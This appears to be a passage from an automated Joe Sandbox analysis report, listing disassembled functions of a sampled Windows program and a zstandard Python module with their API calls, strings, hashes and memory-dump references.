                                                                                                                                                                                                            • API ID: Err_Formatmemset$callocfreemalloc
                                                                                                                                                                                                            • String ID: unable to reference prepared dictionary: %s$unable to set decoding format: %s$unable to set max window size: %s
                                                                                                                                                                                                            • API String ID: 1115549343-3834487836
                                                                                                                                                                                                            • Opcode ID: 0a4261e5568b4b5127d9ea91fed6b4ba57b2b1f773d85702e6bf53f4a4c8d535
                                                                                                                                                                                                            • Instruction ID: 5f1fa0e8d1bdacfac210cc69a0719f400820ee6a576b63b7b0e5c8f6b5198be8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a4261e5568b4b5127d9ea91fed6b4ba57b2b1f773d85702e6bf53f4a4c8d535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A1B022A0AB8296EA688F35E5403BD63A0FF84BE0F044235CB6E077D4DF7CE6519714
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                            • API String ID: 0-666925554
                                                                                                                                                                                                            • Opcode ID: 437f6b1f2434eace19cd89ea29424d2acc198f60ce00cba360b2c46846cff29f
                                                                                                                                                                                                            • Instruction ID: a7fc1a1fd731f13f7e876c85c43d5293fea151095c3938a644b0df026b126a96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 437f6b1f2434eace19cd89ea29424d2acc198f60ce00cba360b2c46846cff29f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851CC71B0E782A5EA10BB11E6046B9F3A0AF41BE6F860031DD0D677B6EE3CE1458760
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_SizeString$From$Dealloc$Arg_Err_Keywords_ParseResizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$stream is closed
                                                                                                                                                                                                            • API String ID: 1115402114-2335832740
                                                                                                                                                                                                            • Opcode ID: 5d84b137e0622bc31e60dd31273003b38a27a6873750c0c51bc987a984097242
                                                                                                                                                                                                            • Instruction ID: 14ff2ed46f9c1f73a6942b2aa4d2d82a4b98143cd82ee68181dc71c7c211f2fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d84b137e0622bc31e60dd31273003b38a27a6873750c0c51bc987a984097242
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151CE32A0AA42A2EF508F34E85027D73A1FF94BE0F54423ADAAD462E4DF7CD195D714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Mem_$MallocString$FreeMemorySizeSubtypeTuple_Type_
                                                                                                                                                                                                            • String ID: ZstdBufferWithSegments cannot be empty$arguments must be BufferWithSegments instances$must pass at least 1 argument
                                                                                                                                                                                                            • API String ID: 946150407-1379776884
                                                                                                                                                                                                            • Opcode ID: 8fdac9aaf58b18c8ba38e122fa620e2748ab5cef8205acfceb5098a336757764
                                                                                                                                                                                                            • Instruction ID: 4415ea5054f8e61d5256f3589779ff84996d25c4c9a981fbb43685c4cd2be165
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fdac9aaf58b18c8ba38e122fa620e2748ab5cef8205acfceb5098a336757764
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1412866A0AF06A2EA10CF25A84453C33A4FB49BE4F090636DE5D437A4DF7CE5A5E314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Arg_AttrBufferCallDeallocErr_FormatKeywords_ObjectParseSizeStringTrueTuple
                                                                                                                                                                                                            • String ID: O|KkO:stream_reader$error setting source source: %s$must pass an object with a read() method or that conforms to the buffer protocol$read
                                                                                                                                                                                                            • API String ID: 3867929704-1248902592
                                                                                                                                                                                                            • Opcode ID: c16cc93634b5362c8f41f1ed6ea24e0d923dd8b1d038cb3711f6f109bfce3f2b
                                                                                                                                                                                                            • Instruction ID: cb70a5ff51ef24307407813184591d7bb19c5c0287cdb4517451905e0871a71d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c16cc93634b5362c8f41f1ed6ea24e0d923dd8b1d038cb3711f6f109bfce3f2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1513732A0AB4692EB50CF25E88426D33A4FB88FD0F554136CA5E877A4DF38D5A5C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                            • API String ID: 4998090-2855260032
                                                                                                                                                                                                            • Opcode ID: 3a311ca896c23303b083235c6b21b739ade8233c859481b729e43c8a7aab684c
                                                                                                                                                                                                            • Instruction ID: 969b948f3fdb2a544950ed6ba1935ade683a4ef494db15deae2b2830ab80e4c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a311ca896c23303b083235c6b21b739ade8233c859481b729e43c8a7aab684c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A53261D782A6E750AF11E4446AAF361FB84795F850231FA5E67AF4DF3CD408CB10
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Release$Arg_Err_FormatKeywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: offset within segments array references memory outside buffer$segments array size is not a multiple of %zu$y*y*:BufferWithSegments
                                                                                                                                                                                                            • API String ID: 3888823503-1353136108
                                                                                                                                                                                                            • Opcode ID: 51d914ab6df999cd9288f3fdb9d47c246dcc8a148b1c1abec9f33b7f40e5537a
                                                                                                                                                                                                            • Instruction ID: 1272189749ed27bd4104e4fc925c24e90efb5cb165b2439c3cdda47927544402
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d914ab6df999cd9288f3fdb9d47c246dcc8a148b1c1abec9f33b7f40e5537a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8416332A19F82A2EE608F25E85036D73A0FB95BC4F445235DA8D137A5DF7CE5A5C304
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003A99
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AA5
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AF5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB73
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A7FFFB8A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB94
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFB9D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBA8
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A7FFFBB8
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBC2
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A7FFFBCB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memmove.VCRUNTIME140 ref: 00007FF8A7FFFC4C
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B5A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B63
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003BE5
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003BEE
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003C49
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memmove.VCRUNTIME140 ref: 00007FF8A7FFFC5C
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFFAB0: memset.VCRUNTIME140 ref: 00007FF8A7FFFC69
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003D95
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DAA
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DC3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DCC
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DE7
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003DF0
                                                                                                                                                                                                              • Part of subcall function 00007FF8A80040F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A800419E
                                                                                                                                                                                                              • Part of subcall function 00007FF8A80040F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80041C3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003E0B
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003E14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$__acrt_iob_funcmallocmemmove$fflushfprintf$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 307045256-0
                                                                                                                                                                                                            • Opcode ID: 5370d4b22be78fb839b6b516b2ab587cbf84f2cdde9dbcffab721f886a083ec4
                                                                                                                                                                                                            • Instruction ID: f6ab65344dc0be44788f2575ac2aba0d3563dc3c465fe69f36401fc0b7fb130e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5370d4b22be78fb839b6b516b2ab587cbf84f2cdde9dbcffab721f886a083ec4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1AE3250AF8595DA268F25B4013AAB3A4FF49BE4F054235EE9E13B94DF3CD1A1C714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C478
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807727D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772EE
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772FB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077308
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773B6
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077230: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773C4
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C482
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,00000279,?,00000279,?,00007FF8A80607C1), ref: 00007FF8A801C538
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C542
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C569
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C572
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF8A801C610
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF8A801C61D
                                                                                                                                                                                                            • memset.VCRUNTIME140 ref: 00007FF8A801C636
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C642
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C64F
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 00007FF8A801C65C
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32 ref: 00007FF8A801C669
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$CriticalSection$ConditionVariable$memset$calloc$EnterLeave_beginthreadex_errno
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2416272369-0
                                                                                                                                                                                                            • Opcode ID: 3386ea11123b8719f3fa4faf729558dbb714d14ec974c689c241498ce3266f5e
                                                                                                                                                                                                            • Instruction ID: 34adc2fd32f92bdd2076c1f47373538b93c427947f238fa4c40b676bc8b334bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3386ea11123b8719f3fa4faf729558dbb714d14ec974c689c241498ce3266f5e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9881B132A1AF82A2EB19DF2594512A9A3A0FF587D4F054235DB8E076A0DF3CE5A1C744
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Err_StringTrue$Arg_AttrBufferCallDeallocFormatKeywords_ObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kOO:stream_reader$must pass an object with a read() method or that conforms to the buffer protocol$read
                                                                                                                                                                                                            • API String ID: 4086204872-2737067712
                                                                                                                                                                                                            • Opcode ID: 0e065d7b493d3b196c270754ab225a088168b63bc27d6643e82d6d11d8807553
                                                                                                                                                                                                            • Instruction ID: 076092e67af8030df7a1aa212c33cf1e09644ea48de4807c8675f20bd3d4108e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e065d7b493d3b196c270754ab225a088168b63bc27d6643e82d6d11d8807553
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B413632A0AB46A1EB508F69E85427D33A4FB98BD0F558136CA8D83394DF7CD9A4D314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ReadyType_$Module_Object
                                                                                                                                                                                                            • String ID: BufferSegment$BufferSegments$BufferWithSegments$BufferWithSegmentsCollection
                                                                                                                                                                                                            • API String ID: 3123587515-3060106826
                                                                                                                                                                                                            • Opcode ID: 7ce8e4062ccbe84f2a64e7a0a053fb87031a0827ed894e252c60fb3c78cff6c4
                                                                                                                                                                                                            • Instruction ID: 66b8830032e2a68f5ff118b6c915629f78a5ddf16ad4ee5e539abe34d813278d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ce8e4062ccbe84f2a64e7a0a053fb87031a0827ed894e252c60fb3c78cff6c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E218E60A0BA07B1FE009F59B89027437A4FF197D8F561536C81E536A4DF3CE1A9D368
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                            • Opcode ID: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction ID: 0b7826430d0cf7a90934adf39a70d1d8bb12a0e76d323ea0f73b036c269b5f03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
